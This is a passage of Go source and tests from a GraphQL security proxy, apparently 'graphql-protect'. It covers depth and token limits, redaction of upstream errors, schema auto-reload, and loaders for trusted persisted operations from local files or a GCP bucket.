assert.Equal(t, http.StatusMethodNotAllowed, res.StatusCode) 88 | }, 89 | }, 90 | { 91 | name: "does block PUT that contain extensions for blocking persisted operations", 92 | args: args{ 93 | cfg: Config{ 94 | Enabled: true, 95 | }, 96 | request: func() *http.Request { 97 | return httptest.NewRequest("DELETE", "/graphql?extensions=something", nil) 98 | }(), 99 | }, 100 | want: func(res *http.Response) { 101 | assert.Equal(t, http.StatusMethodNotAllowed, res.StatusCode) 102 | }, 103 | }, 104 | } 105 | for _, tt := range tests { 106 | t.Run(tt.name, func(_ *testing.T) { 
107 | rec := httptest.NewRecorder() 108 | 109 | mw := EnforcePostMethod(tt.args.cfg) 110 | mw(requestRecorder{}).ServeHTTP(rec, tt.args.request) 111 | result := rec.Result() 112 | defer result.Body.Close() 113 | 114 | tt.want(result) 115 | }) 116 | } 117 | } 118 | 119 | type requestRecorder struct { 120 | } 121 | 122 | func (r requestRecorder) ServeHTTP(writer http.ResponseWriter, _ *http.Request) { 123 | _, _ = writer.Write([]byte("hello world")) 124 | } 125 | -------------------------------------------------------------------------------- /internal/business/rules/max_depth/max_depth.go: -------------------------------------------------------------------------------- 1 | package max_depth // nolint:revive 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "github.com/vektah/gqlparser/v2/ast" 6 | "github.com/vektah/gqlparser/v2/validator" 7 | "log/slog" 8 | ) 9 | 10 | var resultCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 11 | Namespace: "graphql_protect", 12 | Subsystem: "max_depth", 13 | Name: "results", 14 | Help: "The results of the max_depth rule", 15 | }, 16 | []string{"type", "result"}, 17 | ) 18 | 19 | type Config struct { 20 | Enabled bool `yaml:"enabled"` // deprecated 21 | Max int `yaml:"max"` // deprecated 22 | Field MaxRule `yaml:"field"` 23 | List MaxRule `yaml:"list"` 24 | RejectOnFailure bool `yaml:"reject_on_failure"` // deprecated 25 | } 26 | 27 | type MaxRule struct { 28 | Enabled bool `yaml:"enabled"` 29 | Max int `yaml:"max"` 30 | RejectOnFailure bool `yaml:"reject_on_failure"` 31 | } 32 | 33 | func DefaultConfig() Config { 34 | return Config{ 35 | Enabled: false, 36 | Max: 15, 37 | Field: MaxRule{ 38 | Enabled: true, 39 | Max: 15, 40 | RejectOnFailure: true, 41 | }, 42 | List: MaxRule{ 43 | Enabled: true, 44 | Max: 2, 45 | RejectOnFailure: true, 46 | }, 47 | RejectOnFailure: false, 48 | } 49 | } 50 | 51 | func init() { 52 | prometheus.MustRegister(resultCounter) 53 | } 54 | 55 | func NewMaxDepthRule(log 
// NewMaxDepthRule registers the "MaxDepth" validation rule with the gqlparser
// validator. For every operation it computes the field depth and list depth
// once, then applies up to three independent checks: the new field rule
// (cfg.Field), the new list rule (cfg.List), and the deprecated top-level
// rule (cfg.Enabled/cfg.Max/cfg.RejectOnFailure). Each check records exactly
// one of the rejected/failed/allowed results on the Prometheus counter and,
// when configured to reject, adds a validation error at the operation's
// position.
//
// NOTE(review): the warning below fires whenever cfg.Max differs from
// cfg.Field.Max, even when only the new configuration is in use — presumably
// intended to detect old configs; confirm against config defaults.
func NewMaxDepthRule(log *slog.Logger, cfg Config) { // nolint:funlen,cyclop // to be cleaned up after deprecated configuration fields are removed
	if cfg.Max != cfg.Field.Max {
		log.Warn("Using old `max_depth` configuration. Please update to new configuration options, see https://github.com/supportivefe/graphql-protect/blob/main/docs/protections/max_depth.md")
	}
	if cfg.Enabled && cfg.Field.Enabled {
		// if both old and new config options are supplied, disable the old to prevent doing it twice
		cfg.Enabled = false
	}

	validator.AddRule("MaxDepth", func(observers *validator.Events, addError validator.AddErrFunc) {
		observers.OnOperation(func(_ *validator.Walker, operation *ast.OperationDefinition) {
			// Single traversal yields both depth flavors.
			fieldDepth, listDepth := countDepth(operation.SelectionSet)

			// New-style field depth check.
			if cfg.Field.Enabled {
				if fieldDepth > cfg.Field.Max {
					if cfg.Field.RejectOnFailure {
						addError(
							validator.Message("syntax error: Field depth limit of %d exceeded, found %d", cfg.Field.Max, fieldDepth),
							validator.At(operation.Position),
						)
						resultCounter.WithLabelValues("field", "rejected").Inc()
					} else {
						// Over the limit but configured not to reject: record only.
						resultCounter.WithLabelValues("field", "failed").Inc()
					}
				} else {
					resultCounter.WithLabelValues("field", "allowed").Inc()
				}
			}

			// New-style list depth check.
			if cfg.List.Enabled {
				if listDepth > cfg.List.Max {
					if cfg.List.RejectOnFailure {
						addError(
							validator.Message("syntax error: List depth limit of %d exceeded, found %d", cfg.List.Max, listDepth),
							validator.At(operation.Position),
						)
						resultCounter.WithLabelValues("list", "rejected").Inc()
					} else {
						resultCounter.WithLabelValues("list", "failed").Inc()
					}
				} else {
					resultCounter.WithLabelValues("list", "allowed").Inc()
				}
			}

			// Deprecated top-level check; reports under the "field" label and
			// is force-disabled above when the new field rule is also enabled.
			if cfg.Enabled {
				if fieldDepth > cfg.Max {
					if cfg.RejectOnFailure {
						addError(
							validator.Message("syntax error: Depth limit of %d exceeded, found %d", cfg.Max, fieldDepth),
							validator.At(operation.Position),
						)
						resultCounter.WithLabelValues("field", "rejected").Inc()
					} else {
						resultCounter.WithLabelValues("field", "failed").Inc()
					}
				} else {
					resultCounter.WithLabelValues("field", "allowed").Inc()
				}
			}
		})
	})
}
// countDepth recursively computes two depth measures for a selection set:
// the maximum field nesting depth (first return value) and the maximum
// nesting depth counting only list-typed fields (second return value).
// A nil selection set contributes (0, 0).
func countDepth(selectionSet ast.SelectionSet) (int, int) { // nolint:cyclop // inherently cyclomatic
	if selectionSet == nil {
		return 0, 0
	}

	// start with 1 depth because root counts as the first depth
	fieldDepth := 1
	// start with 0 depth because we don't know yet if it is a list type
	listDepth := 0

	for _, selection := range selectionSet {
		switch v := selection.(type) {
		case *ast.Field:
			fieldSelectionDepth, listSelectionDepth := countDepth(v.SelectionSet)
			fieldSelectionDepth++ // increase because we're on a field

			if v.Definition != nil && isList(v.Definition.Type) {
				listSelectionDepth++ // increase because we're on a list
			}
			if listSelectionDepth > listDepth {
				listDepth = listSelectionDepth
			}
			if fieldSelectionDepth > fieldDepth {
				fieldDepth = fieldSelectionDepth
			}
		case *ast.FragmentSpread:
			// Fragments flatten into the parent selection: the spread itself
			// adds no extra level, only the fragment's own selections count.
			fieldSelectionDepth, listSelectionDepth := countDepth(v.Definition.SelectionSet)
			if fieldSelectionDepth > fieldDepth {
				fieldDepth = fieldSelectionDepth
			}
			if listSelectionDepth > listDepth {
				listDepth = listSelectionDepth
			}
		}
	}
	return fieldDepth, listDepth

}

// isList reports whether the given type is a list type. In gqlparser's AST a
// non-empty NamedType marks a named (non-list) type, so a nil NamedType-less
// type is treated as a list.
func isList(t *ast.Type) bool {
	if t == nil {
		return false
	}

	if t.NamedType != "" {
		return false
	}
	return true
}
-------------------------------------------------------------------------------- 1 | package max_depth // nolint:revive 2 | 3 | import ( 4 | "fmt" 5 | "github.com/stretchr/testify/assert" 6 | "github.com/vektah/gqlparser/v2" 7 | "github.com/vektah/gqlparser/v2/ast" 8 | "github.com/vektah/gqlparser/v2/parser" 9 | "github.com/vektah/gqlparser/v2/validator" 10 | "log/slog" 11 | "testing" 12 | ) 13 | 14 | func Test_MaxListDepthRule(t *testing.T) { 15 | schema := ` 16 | type Query { 17 | me: User 18 | } 19 | 20 | type User { 21 | id: ID! 22 | name: String 23 | friends: [User!]! 24 | } 25 | 26 | ` 27 | type args struct { 28 | query string 29 | schema string 30 | cfg Config 31 | } 32 | tests := []struct { 33 | name string 34 | args args 35 | want error 36 | }{ 37 | { 38 | name: "no query yields zero count", 39 | args: args{ 40 | query: "", 41 | schema: schema, 42 | cfg: Config{ 43 | List: MaxRule{ 44 | Max: 15, 45 | Enabled: true, 46 | }, 47 | }, 48 | }, 49 | want: nil, 50 | }, 51 | { 52 | name: "Calculate the depth properly with fragments", 53 | args: args{ 54 | cfg: Config{ 55 | List: MaxRule{ 56 | Max: 3, 57 | Enabled: true, 58 | RejectOnFailure: true, 59 | }, 60 | }, 61 | query: ` 62 | query A { 63 | me { 64 | ...UserFragment 65 | } 66 | } 67 | fragment UserFragment on User { 68 | id 69 | name 70 | }`, 71 | schema: schema, 72 | }, 73 | want: nil, 74 | }, 75 | { 76 | name: "Calculate list depth properly", 77 | args: args{ 78 | cfg: Config{ 79 | Enabled: false, 80 | Field: MaxRule{ 81 | Enabled: false, 82 | }, 83 | List: MaxRule{ 84 | Enabled: true, 85 | Max: 2, 86 | RejectOnFailure: true, 87 | }, 88 | }, 89 | query: ` 90 | query A { 91 | me { 92 | id 93 | name 94 | friends { 95 | name 96 | friends { 97 | name 98 | friends { 99 | name 100 | friends { 101 | name 102 | } 103 | } 104 | } 105 | } 106 | } 107 | }`, 108 | schema: schema, 109 | }, 110 | want: fmt.Errorf("syntax error: List depth limit of %d exceeded, found %d", 2, 4), 111 | }, 112 | { 113 | name: "Calculates 
list depth per nested list. Does not sum counts of each list", 114 | args: args{ 115 | cfg: Config{ 116 | Enabled: false, 117 | Field: MaxRule{ 118 | Enabled: false, 119 | }, 120 | List: MaxRule{ 121 | Enabled: true, 122 | Max: 2, 123 | RejectOnFailure: true, 124 | }, 125 | }, 126 | query: ` 127 | query A { 128 | a1: me { 129 | id 130 | name 131 | friends { 132 | name 133 | friends { 134 | name 135 | } 136 | } 137 | } 138 | a2: me { 139 | id 140 | name 141 | friends { 142 | name 143 | friends { 144 | name 145 | } 146 | } 147 | } 148 | }`, 149 | schema: schema, 150 | }, 151 | want: nil, 152 | }, 153 | } 154 | for _, tt := range tests { 155 | t.Run(tt.name, func(t *testing.T) { 156 | NewMaxDepthRule(slog.Default(), tt.args.cfg) 157 | 158 | query, _ := parser.ParseQuery(&ast.Source{Name: "ff", Input: tt.args.query}) 159 | schema := gqlparser.MustLoadSchema(&ast.Source{ 160 | Name: "graph/schema.graphqls", 161 | Input: tt.args.schema, 162 | BuiltIn: false, 163 | }) 164 | 165 | errs := validator.Validate(schema, query) 166 | 167 | if tt.want == nil { 168 | assert.Empty(t, errs) 169 | } else { 170 | assert.Equal(t, tt.want.Error(), errs[0].Message) 171 | } 172 | 173 | validator.RemoveRule("MaxDepth") 174 | }) 175 | } 176 | } 177 | 178 | func Test_MaxDepthRule(t *testing.T) { 179 | schema := ` 180 | type Query { 181 | getBook(title: String): Book 182 | } 183 | 184 | type Book { 185 | id: ID! 186 | title: String 187 | author: Author! 188 | price: Price! 189 | } 190 | type Author { 191 | id: ID! 192 | name: String 193 | } 194 | type Price { 195 | price: Int! 196 | id: ID! 
197 | } 198 | ` 199 | type args struct { 200 | query string 201 | schema string 202 | cfg Config 203 | } 204 | tests := []struct { 205 | name string 206 | args args 207 | want error 208 | }{ 209 | { 210 | name: "no query yields zero count", 211 | args: args{ 212 | query: "", 213 | schema: schema, 214 | cfg: Config{ 215 | Field: MaxRule{ 216 | Max: 15, 217 | Enabled: true, 218 | }, 219 | }, 220 | }, 221 | want: nil, 222 | }, 223 | { 224 | name: "works with old config", 225 | args: args{ 226 | cfg: Config{ 227 | Enabled: true, 228 | Max: 2, 229 | RejectOnFailure: true, 230 | Field: MaxRule{ 231 | Enabled: false, 232 | Max: 0, 233 | RejectOnFailure: false, 234 | }, 235 | }, 236 | query: ` 237 | query { 238 | getBook(title: "null") { 239 | title 240 | price { 241 | price 242 | id 243 | } 244 | } 245 | }`, 246 | schema: schema, 247 | }, 248 | want: fmt.Errorf("syntax error: Depth limit of %d exceeded, found %d", 2, 3), 249 | }, 250 | { 251 | name: "Calculate the depth properly with fragments", 252 | args: args{ 253 | cfg: Config{ 254 | Field: MaxRule{ 255 | Max: 3, 256 | Enabled: true, 257 | RejectOnFailure: true, 258 | }, 259 | }, 260 | query: ` 261 | query A { 262 | getBook(title: "null") { 263 | id 264 | ...BookFragment 265 | } 266 | } 267 | fragment BookFragment on Book { 268 | author { 269 | name 270 | } 271 | }`, 272 | schema: schema, 273 | }, 274 | want: nil, 275 | }, 276 | { 277 | name: "Calculate depth properly", 278 | args: args{ 279 | cfg: Config{ 280 | Field: MaxRule{ 281 | Enabled: true, 282 | Max: 2, 283 | RejectOnFailure: true, 284 | }, 285 | }, 286 | query: ` 287 | query { 288 | getBook(title: "null") { 289 | title 290 | price { 291 | price 292 | id 293 | } 294 | } 295 | }`, 296 | schema: schema, 297 | }, 298 | want: fmt.Errorf("syntax error: Field depth limit of %d exceeded, found %d", 2, 3), 299 | }, 300 | { 301 | name: "Works correctly with fragments", 302 | args: args{ 303 | cfg: Config{ 304 | Field: MaxRule{ 305 | Max: 2, 306 | Enabled: true, 307 | 
// ObfuscateUpstreamErrors replaces the details of upstream GraphQL errors
// with a single generic message so internal error information is not leaked
// to clients.
type ObfuscateUpstreamErrors struct {
	enabled bool
}

// NewObfuscateUpstreamErrors builds the rule; it is considered active only
// when obfuscateUpstreamErrors is true.
func NewObfuscateUpstreamErrors(obfuscateUpstreamErrors bool) *ObfuscateUpstreamErrors {
	return &ObfuscateUpstreamErrors{
		enabled: obfuscateUpstreamErrors,
	}
}

// ProcessBody swaps any non-nil "errors" entry in the response payload for a
// single redacted error entry, leaving every other key untouched, and
// returns the (mutated) payload.
func (a *ObfuscateUpstreamErrors) ProcessBody(payload map[string]interface{}) map[string]interface{} {
	if payload["errors"] == nil {
		return payload
	}

	payload["errors"] = []map[string]interface{}{
		{
			"message": "Error(s) redacted",
		},
	}

	return payload
}

// Enabled reports whether this rule is turned on.
func (a *ObfuscateUpstreamErrors) Enabled() bool {
	return a.enabled
}
| -------------------------------------------------------------------------------- /internal/business/rules/obfuscate_upstream_errors/obfuscate_upstream_errors_test.go: -------------------------------------------------------------------------------- 1 | package obfuscate_upstream_errors // nolint:revive 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | func TestProcessBody(t *testing.T) { 9 | type args struct { 10 | payload map[string]interface{} 11 | } 12 | tests := []struct { 13 | name string 14 | args args 15 | want map[string]interface{} 16 | }{ 17 | { 18 | name: "nothing happens when not expected format", 19 | args: args{ 20 | payload: map[string]interface{}{ 21 | "hi": "bye", 22 | }, 23 | }, 24 | want: map[string]interface{}{ 25 | "hi": "bye", 26 | }, 27 | }, 28 | { 29 | name: "processes errors payload", 30 | args: args{ 31 | payload: map[string]interface{}{ 32 | "errors": []map[string]interface{}{ 33 | { 34 | "message": "hello", 35 | }, 36 | }, 37 | }, 38 | }, 39 | want: map[string]interface{}{ 40 | "errors": []map[string]interface{}{ 41 | { 42 | "message": "Error(s) redacted", 43 | }, 44 | }, 45 | }, 46 | }, 47 | { 48 | name: "can handle unexpected types", 49 | args: args{ 50 | payload: map[string]interface{}{ 51 | "errors": []map[string]interface{}{ 52 | { 53 | "message": 1, 54 | }, 55 | }, 56 | }, 57 | }, 58 | want: map[string]interface{}{ 59 | "errors": []map[string]interface{}{ 60 | { 61 | "message": "Error(s) redacted", 62 | }, 63 | }, 64 | }, 65 | }, 66 | { 67 | name: "Replaces suggestions when found", 68 | args: args{ 69 | payload: map[string]interface{}{ 70 | "errors": []map[string]interface{}{ 71 | { 72 | "message": "Did you mean 'foobar'?", 73 | }, 74 | }, 75 | }, 76 | }, 77 | want: map[string]interface{}{ 78 | "errors": []map[string]interface{}{ 79 | { 80 | "message": "Error(s) redacted", 81 | }, 82 | }, 83 | }, 84 | }, 85 | { 86 | name: "Doesn't affect any other fields", 87 | args: args{ 88 | payload: map[string]interface{}{ 89 | 
"data": map[string]interface{}{ 90 | "foo": "bar", 91 | "boolean": 1, 92 | }, 93 | "errors": []map[string]interface{}{ 94 | { 95 | "message": "Error(s) redacted", 96 | }, 97 | }, 98 | }, 99 | }, 100 | want: map[string]interface{}{ 101 | "data": map[string]interface{}{ 102 | "foo": "bar", 103 | "boolean": 1, 104 | }, 105 | "errors": []map[string]interface{}{ 106 | { 107 | "message": "Error(s) redacted", 108 | }, 109 | }, 110 | }, 111 | }, 112 | } 113 | for _, tt := range tests { 114 | t.Run(tt.name, func(t *testing.T) { 115 | b := NewObfuscateUpstreamErrors(true) 116 | 117 | if got := b.ProcessBody(tt.args.payload); !reflect.DeepEqual(got, tt.want) { 118 | t.Errorf("ProcessBody() = %v, want %v", got, tt.want) 119 | } 120 | }) 121 | } 122 | } 123 | -------------------------------------------------------------------------------- /internal/business/rules/tokens/tokens.go: -------------------------------------------------------------------------------- 1 | package tokens 2 | 3 | import ( 4 | "fmt" 5 | "github.com/prometheus/client_golang/prometheus" 6 | "github.com/vektah/gqlparser/v2/ast" 7 | "github.com/vektah/gqlparser/v2/lexer" 8 | ) 9 | 10 | var resultCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 11 | Namespace: "graphql_protect", 12 | Subsystem: "max_tokens", 13 | Name: "results", 14 | Help: "The results of the max tokens rule", 15 | }, 16 | []string{"result"}, 17 | ) 18 | 19 | type Config struct { 20 | Enabled bool `yaml:"enabled"` 21 | Max int `yaml:"max"` 22 | RejectOnFailure bool `yaml:"reject_on_failure"` 23 | } 24 | 25 | func DefaultConfig() Config { 26 | return Config{ 27 | Enabled: true, 28 | Max: 1_000, 29 | RejectOnFailure: true, 30 | } 31 | } 32 | 33 | func init() { 34 | prometheus.MustRegister(resultCounter) 35 | } 36 | 37 | type MaxTokensRule struct { 38 | cfg Config 39 | } 40 | 41 | func MaxTokens(cfg Config) *MaxTokensRule { 42 | return &MaxTokensRule{ 43 | cfg: cfg, 44 | } 45 | } 46 | 47 | func (t *MaxTokensRule) Validate(source 
*ast.Source) error { 48 | if !t.cfg.Enabled { 49 | return nil 50 | } 51 | 52 | lex := lexer.New(source) 53 | count := 0 54 | 55 | for { 56 | tok, err := lex.ReadToken() 57 | 58 | if err != nil { 59 | return err 60 | } 61 | 62 | if tok.Kind == lexer.EOF { 63 | break 64 | } 65 | 66 | count++ 67 | } 68 | 69 | if count > t.cfg.Max { 70 | if t.cfg.RejectOnFailure { 71 | resultCounter.WithLabelValues("rejected").Inc() 72 | return fmt.Errorf("operation has exceeded maximum tokens. found [%d], max [%d]", count, t.cfg.Max) 73 | } 74 | resultCounter.WithLabelValues("failed").Inc() 75 | } 76 | resultCounter.WithLabelValues("allowed").Inc() 77 | return nil 78 | } 79 | -------------------------------------------------------------------------------- /internal/business/rules/tokens/tokens_test.go: -------------------------------------------------------------------------------- 1 | package tokens 2 | 3 | import ( 4 | "github.com/stretchr/testify/assert" 5 | "github.com/vektah/gqlparser/v2/ast" 6 | "testing" 7 | ) 8 | 9 | func TestMaxTokens(t *testing.T) { 10 | type args struct { 11 | cfg Config 12 | operation string 13 | } 14 | tests := []struct { 15 | name string 16 | args args 17 | wantErr bool 18 | }{ 19 | { 20 | name: "rule disabled does nothing", 21 | args: args{ 22 | cfg: Config{ 23 | Enabled: false, 24 | Max: 0, 25 | RejectOnFailure: true, 26 | }, 27 | operation: "query { foo }", 28 | }, 29 | wantErr: false, 30 | }, 31 | { 32 | name: "yields error when tokens exceed max", 33 | args: args{ 34 | cfg: Config{ 35 | Enabled: true, 36 | Max: 1, 37 | RejectOnFailure: true, 38 | }, 39 | operation: "query { foo }", 40 | }, 41 | wantErr: true, 42 | }, 43 | { 44 | name: "yields no error when tokens less than max", 45 | args: args{ 46 | cfg: Config{ 47 | Enabled: true, 48 | Max: 1000000, 49 | RejectOnFailure: true, 50 | }, 51 | operation: "query { foo }", 52 | }, 53 | wantErr: false, 54 | }, 55 | { 56 | name: "yields no error when tokens exceed max but failure on rejections is false", 
57 | args: args{ 58 | cfg: Config{ 59 | Enabled: true, 60 | Max: 1, 61 | RejectOnFailure: false, 62 | }, 63 | operation: "query { foo }", 64 | }, 65 | wantErr: false, 66 | }, 67 | } 68 | for _, tt := range tests { 69 | t.Run(tt.name, func(t *testing.T) { 70 | rule := MaxTokens(tt.args.cfg) 71 | 72 | source := &ast.Source{ 73 | Input: tt.args.operation, 74 | } 75 | 76 | err := rule.Validate(source) 77 | 78 | if tt.wantErr { 79 | assert.Error(t, err) 80 | } else { 81 | assert.NoError(t, err) 82 | } 83 | }) 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /internal/business/schema/schema.go: -------------------------------------------------------------------------------- 1 | package schema 2 | 3 | import ( 4 | "fmt" 5 | "github.com/prometheus/client_golang/prometheus" 6 | "github.com/vektah/gqlparser/v2" 7 | "github.com/vektah/gqlparser/v2/ast" 8 | "log/slog" 9 | "os" 10 | "time" 11 | ) 12 | 13 | var reloadGauge = prometheus.NewGaugeVec(prometheus.GaugeOpts{ 14 | Namespace: "graphql_protect", 15 | Subsystem: "schema", 16 | Name: "reload", 17 | Help: "Gauge tracking reloading behavior", 18 | ConstLabels: nil, 19 | }, 20 | []string{"state"}) 21 | 22 | type Config struct { 23 | Path string `yaml:"path"` 24 | AutoReload struct { 25 | Enabled bool `yaml:"enabled"` 26 | Interval time.Duration `yaml:"interval"` 27 | } `yaml:"auto_reload"` 28 | } 29 | 30 | func DefaultConfig() Config { 31 | return Config{ 32 | Path: "./schema.graphql", 33 | AutoReload: struct { 34 | Enabled bool `yaml:"enabled"` 35 | Interval time.Duration `yaml:"interval"` 36 | }(struct { 37 | Enabled bool 38 | Interval time.Duration 39 | }{ 40 | Enabled: true, 41 | Interval: 30 * time.Second, 42 | }), 43 | } 44 | } 45 | 46 | type Provider struct { 47 | cfg Config 48 | schema *ast.Schema 49 | done chan bool 50 | refreshTicker *time.Ticker 51 | log *slog.Logger 52 | } 53 | 54 | func NewSchema(cfg Config, log *slog.Logger) (*Provider, error) { 55 | 
refreshTicker := func() *time.Ticker { 56 | if !cfg.AutoReload.Enabled { 57 | return nil 58 | } 59 | return time.NewTicker(cfg.AutoReload.Interval) 60 | }() 61 | 62 | p := Provider{ 63 | cfg: cfg, 64 | // nil until we load 65 | schema: nil, 66 | // buffered in case we don't have reloading enabled 67 | done: make(chan bool, 1), 68 | refreshTicker: refreshTicker, 69 | log: log, 70 | } 71 | 72 | err := p.loadFromFs() 73 | if err != nil { 74 | return nil, fmt.Errorf("unable to load schema from disk [%s]: %w", p.cfg.Path, err) 75 | } 76 | 77 | // initiate auto reloading 78 | p.reload() 79 | 80 | return &p, nil 81 | } 82 | 83 | func (p *Provider) load(contents string) error { 84 | schema, err := gqlparser.LoadSchema(&ast.Source{ 85 | Name: "graph/schema.graphqls", 86 | Input: contents, 87 | BuiltIn: false, 88 | }) 89 | if err != nil { 90 | return err 91 | } 92 | 93 | p.schema = schema 94 | return nil 95 | } 96 | 97 | func (p *Provider) loadFromFs() error { 98 | contents, err := os.ReadFile(p.cfg.Path) 99 | if err != nil { 100 | return err 101 | 102 | } 103 | return p.load(string(contents)) 104 | } 105 | 106 | func (p *Provider) Get() *ast.Schema { 107 | return p.schema 108 | } 109 | 110 | func (p *Provider) reload() { 111 | if !p.cfg.AutoReload.Enabled { 112 | return 113 | } 114 | 115 | go func() { 116 | for { 117 | select { 118 | case <-p.done: 119 | return 120 | case <-p.refreshTicker.C: 121 | err := p.loadFromFs() 122 | if err != nil { 123 | p.log.Warn("Error loading from local dir", "err", err) 124 | reloadGauge.WithLabelValues("failed").Inc() 125 | continue 126 | } 127 | reloadGauge.WithLabelValues("success").Inc() 128 | } 129 | } 130 | }() 131 | } 132 | 133 | func (p *Provider) Stop() { 134 | p.done <- true 135 | } 136 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/dir_loader.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments // 
// Load reads every non-directory `.json` file in the configured location and
// merges their persisted operations into a single map. Files that cannot be
// read or unmarshalled are logged and skipped; later files overwrite earlier
// entries with the same hash. The number of files read is published on the
// files-loaded gauge.
func (d *LocalLoader) Load(_ context.Context) (map[string]PersistedOperation, error) {
	files, err := os.ReadDir(d.cfg.Loader.Location)
	if err != nil {
		// if we can't read the dir, try creating it
		// NOTE(review): this masks non-"not exist" ReadDir failures (e.g.
		// permissions) behind the Mkdir attempt — confirm that's intended.
		err := os.Mkdir(d.cfg.Loader.Location, 0750)
		if err != nil {
			return nil, err
		}
	}

	result := map[string]PersistedOperation{}
	var filesProcessed = 0
	for _, file := range files {
		if file.IsDir() {
			continue
		}
		if filepath.Ext(file.Name()) == ".json" {
			filePath := filepath.Join(d.cfg.Loader.Location, file.Name())
			contents, err := os.ReadFile(filePath)
			if err != nil {
				d.log.Warn("Error reading file", "err", err)
				continue
			}

			// NOTE(review): counted before unmarshalling, so the gauge
			// includes files that fail to parse — verify intent.
			filesProcessed++

			data, err := unmarshallPersistedOperations(contents)
			if err != nil {
				d.log.Warn("error unmarshalling operation file", "bytes", len(contents), "contents", string(contents), "filepath", filePath, "err", err)
				continue
			}

			maps.Copy(result, data)
		}
	}

	fileLoaderGauge.WithLabelValues().Set(float64(filesProcessed))

	return result, nil
}
// Load lists every object matching `**.json` in the bucket and merges their
// persisted operations into one map. Iteration stops at the first iterator
// error (subsequent Next calls would repeat it); per-file processing errors
// are collected and all errors are joined into the returned error, alongside
// whatever operations did load successfully.
func (g *GcpLoader) Load(ctx context.Context) (map[string]PersistedOperation, error) {
	it := g.client.Bucket(g.bucket).Objects(ctx, &storage.Query{
		MatchGlob:  "**.json",
		Versions:   false,
		Projection: storage.ProjectionNoACL,
	})

	numberOfFilesProcessed := 0

	result := map[string]PersistedOperation{}
	var errs []error
	for {
		attrs, err := it.Next()

		if errors.Is(err, iterator.Done) {
			break
		}
		if err != nil {
			// if any error is returned, any subsequent call returns the same error
			// so we break here
			errs = append(errs, err)
			break
		}

		// A failed file still counts toward numberOfFilesProcessed; its
		// error is joined into the result below.
		data, err := g.processFile(ctx, attrs)
		if err != nil {
			errs = append(errs, err)
		}

		maps.Copy(result, data)

		numberOfFilesProcessed++
	}

	g.log.Info("Loaded files from gcp bucket", "numFiles", numberOfFilesProcessed, "numErrs", len(errs))
	filesLoadedCounter.WithLabelValues().Set(float64(numberOfFilesProcessed))

	return result, errors.Join(errs...)
}
96 | } 97 | 98 | func (g *GcpLoader) processFile(ctx context.Context, attrs *storage.ObjectAttrs) (map[string]PersistedOperation, error) { 99 | ctx, cancel := context.WithTimeout(ctx, time.Second*50) 100 | defer cancel() 101 | 102 | reader, err := g.client.Bucket(g.bucket).Object(attrs.Name).NewReader(ctx) 103 | if err != nil { 104 | cancel() 105 | return nil, fmt.Errorf("Object(%q).NewReader: %w", attrs.Name, err) 106 | } 107 | defer reader.Close() 108 | 109 | data, err := io.ReadAll(reader) 110 | if err != nil { 111 | cancel() 112 | return nil, fmt.Errorf("io.Copy: %w", err) 113 | } 114 | 115 | operations, err := unmarshallPersistedOperations(data) 116 | 117 | for _, operation := range operations { 118 | if operation.Name == "" { 119 | g.log.Warn("Operation without operation name found!", "operation", operation) 120 | } 121 | } 122 | 123 | return operations, err 124 | } 125 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/loader.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments // nolint:revive 2 | 3 | import ( 4 | "context" 5 | "log/slog" 6 | ) 7 | 8 | type Loader interface { 9 | Load(ctx context.Context) (map[string]PersistedOperation, error) 10 | Type() string 11 | } 12 | 13 | func NewLoaderFromConfig(cfg Config, log *slog.Logger) (Loader, error) { 14 | switch cfg.Loader.Type { 15 | case "local": 16 | return NewLocalDirLoader(cfg, log), nil 17 | case "gcp": 18 | return NewGcpLoader(cfg.Loader, log) 19 | default: 20 | log.Info("Loader strategy defaulted to noop loader for type", "type", cfg.Loader.Type) 21 | return NewNoOpLoader() 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/memory_loader.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments // nolint:revive 2 | 3 | import ( 4 | 
"context" 5 | ) 6 | 7 | var _ Loader = &MemoryLoader{} 8 | 9 | // MemoryLoader is a loader for testing purposes 10 | // It allows the user to specify operations in memory 11 | type MemoryLoader struct { 12 | Store map[string]PersistedOperation 13 | } 14 | 15 | func (d *MemoryLoader) Type() string { 16 | return "memory" 17 | } 18 | 19 | func newMemoryLoader(store map[string]PersistedOperation) *MemoryLoader { 20 | return &MemoryLoader{ 21 | Store: store, 22 | } 23 | } 24 | 25 | func (d *MemoryLoader) Load(_ context.Context) (map[string]PersistedOperation, error) { 26 | return d.Store, nil 27 | } 28 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/model.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "regexp" 7 | ) 8 | 9 | // find the first word after the 'query' or 'mutation' keyword 10 | var operationNameRegexPattern = regexp.MustCompile(`\b(query|mutation)\s(\w+)`) 11 | 12 | type PersistedOperation struct { 13 | Operation string 14 | Name string `json:"name,omitempty"` 15 | } 16 | 17 | func unmarshallPersistedOperations(payload []byte) (map[string]PersistedOperation, error) { 18 | var manifestHashes map[string]string 19 | 20 | err := json.Unmarshal(payload, &manifestHashes) 21 | if err != nil { 22 | return nil, fmt.Errorf("error unmarshalling operation file, bytes: %d, contents: %s, error: %w", len(payload), string(payload), err) 23 | } 24 | 25 | data := make(map[string]PersistedOperation) 26 | 27 | for hash, operation := range manifestHashes { 28 | data[hash] = PersistedOperation{ 29 | Operation: operation, 30 | Name: extractOperationNameFromOperation(operation), 31 | } 32 | } 33 | return data, nil 34 | } 35 | 36 | func extractOperationNameFromOperation(payload string) string { 37 | match := operationNameRegexPattern.FindStringSubmatch(payload) 38 | 39 | // match[0] is the entire 
